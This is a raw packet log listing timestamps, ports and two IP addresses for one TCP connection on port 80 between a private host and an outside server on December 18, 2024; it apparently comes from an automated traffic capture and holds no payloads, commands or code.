Dec 18, 2024 13:38:12.661776066 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.661822081 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.661854982 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.661904097 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.662707090 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.662769079 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.662801027 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.662843943 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.663805008 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.663875103 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.663908005 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.663950920 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.664696932 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.664743900 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.664818048 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.664865971 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.665682077 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.665726900 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.813425064 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.813471079 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.813508987 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.813673973 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.813673973 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.813724995 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.813760996 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.813777924 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.813796043 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.813815117 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.813831091 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.813863993 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.814184904 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.814223051 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.814237118 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.814237118 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.814273119 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.814281940 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.814307928 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.814316988 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.814342976 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.814353943 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.814378977 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.814392090 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.814481020 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.815057993 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.815093994 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.815124035 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.815148115 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.815150023 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.815196037 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.815366983 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.815402031 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.815417051 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.815448999 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.819843054 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.819879055 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.819914103 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.819936991 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.819945097 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.819986105 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.820095062 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.820110083 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.820127964 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.820137024 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.820144892 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.820157051 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.820179939 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.820374966 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.820420027 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.820455074 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.820467949 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.820497036 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.820514917 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.820696115 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.820708036 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.820736885 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.820755959 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.821572065 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.821646929 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.821705103 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.821748972 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.822592974 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.822607040 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.822643995 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.822664976 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.823488951 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.823533058 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.823626041 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.823663950 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.824573994 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.824619055 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.824631929 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.824677944 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.825659990 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.825673103 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.825700998 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.825720072 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.826529026 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.826575994 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.826709986 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.826888084 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.827529907 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.827584028 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.827673912 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.827724934 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.828527927 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.828587055 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.828778982 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.828854084 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.829657078 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.829705954 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.829737902 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.829783916 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.830590010 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.830634117 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.830840111 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.830885887 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.831537962 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.831594944 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.831640005 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.831696033 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.832701921 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.832768917 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.832782030 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.832844973 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.833719015 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.833774090 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.833874941 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.833919048 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.834595919 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.834644079 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.834727049 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.834772110 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.835690975 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.835735083 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.835925102 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.835966110 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.836839914 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.836889982 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.837004900 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.837049961 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.837675095 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.837701082 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.837724924 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.837745905 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.838608980 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.838655949 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.838787079 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.838829994 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.839838028 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.839884996 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.840039968 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.840085983 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.840753078 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.840794086 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.840830088 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.840898991 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.841716051 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.841775894 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.841921091 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.841994047 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.842698097 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.842751026 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.842756987 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.842792034 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.843575001 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.843625069 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.843642950 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.843689919 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.844500065 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.844542027 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.844607115 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.844645977 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.845578909 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.845608950 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.845633984 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.845653057 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.846705914 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.846749067 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.846844912 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.846880913 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.847625971 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.847649097 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.847667933 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.847683907 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.848622084 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.848651886 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.848669052 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.848690987 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.849523067 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.849575043 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.849751949 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.849793911 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.850512028 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.850553989 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.850713968 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.850753069 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.851552010 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.851596117 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.851609945 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.851649046 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.852504969 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.852560997 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.852602005 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.852644920 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.853586912 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.853638887 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.853673935 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.853713036 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.854487896 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.854536057 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.854605913 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.854664087 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.855659008 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.855674028 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.855716944 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.855755091 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.856544971 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.856605053 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.856803894 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.856857061 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.857583046 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.857626915 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.857780933 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.857825994 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.858603954 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.858649015 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.858663082 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.858700991 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.859623909 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.859673023 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.998990059 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.999044895 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.999135971 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.999156952 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.999525070 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.999567986 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.999671936 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.999716997 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.000586033 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.000623941 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.000962019 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.000998020 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.001023054 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.001063108 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.001976013 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.002016068 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.002152920 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.002192974 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.003005981 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.003017902 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.003043890 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.003063917 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.003796101 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.003837109 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.003905058 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.003942013 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.004966021 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.005001068 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.005091906 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.005134106 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.005799055 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.005831003 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.005959034 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.005996943 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.006758928 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.006799936 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.006937027 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.006969929 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.007807016 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.007843971 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.007941961 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.007978916 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.008822918 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.008868933 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.008969069 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.009006977 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.009982109 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.010020971 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.010143995 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.010179043 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.010776997 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.010818005 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.010945082 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.010981083 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.011881113 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.011924982 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.012063026 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.012104034 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.012986898 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.013036013 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.013071060 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.013111115 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.013792038 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.013838053 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.013931036 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.013964891 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.014874935 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.014909029 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.014920950 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.014955044 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.015867949 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.015889883 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.015912056 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.015927076 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.016772985 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.016813040 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.016942024 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.016980886 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.017828941 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.017873049 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.017980099 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.018018961 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.018929005 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.018940926 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.018975973 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.019817114 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.019865990 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.020030975 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.020081043 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.020807028 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.020845890 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.021045923 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.021085024 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.021789074 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.021827936 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.021961927 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.022001028 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.022834063 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.022874117 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.023024082 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.023066044 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.023814917 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.023858070 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.024158955 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.024199963 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.024892092 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.024933100 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.024981976 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.025019884 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.026074886 CET	80	49708	31.41.244.11	192.168.2.8
